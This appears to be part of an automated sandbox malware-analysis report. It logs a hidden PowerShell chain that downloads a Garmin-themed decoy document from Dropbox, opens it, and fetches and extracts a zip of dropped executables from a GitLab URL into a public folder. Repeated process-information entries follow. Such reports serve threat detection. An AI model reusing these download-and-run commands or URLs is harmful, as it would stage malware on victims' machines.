                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: pip3.exe.17.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: wsdump.exe.17.drStatic PE information: real checksum: 0x2a492 should be: 0x1c91b
                Source: normalizer.exe.17.drStatic PE information: real checksum: 0x2a492 should be: 0x1ebd5
                Source: pip3.12.exe.17.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: pip.exe.17.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: x86_64-w64-mingw32-nmakehlp.exe.17.drStatic PE information: section name: .xdata
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F3429A push ss; retf 12_2_00007FF848F3429B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F37047 push esp; retf 12_2_00007FF848F37048

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
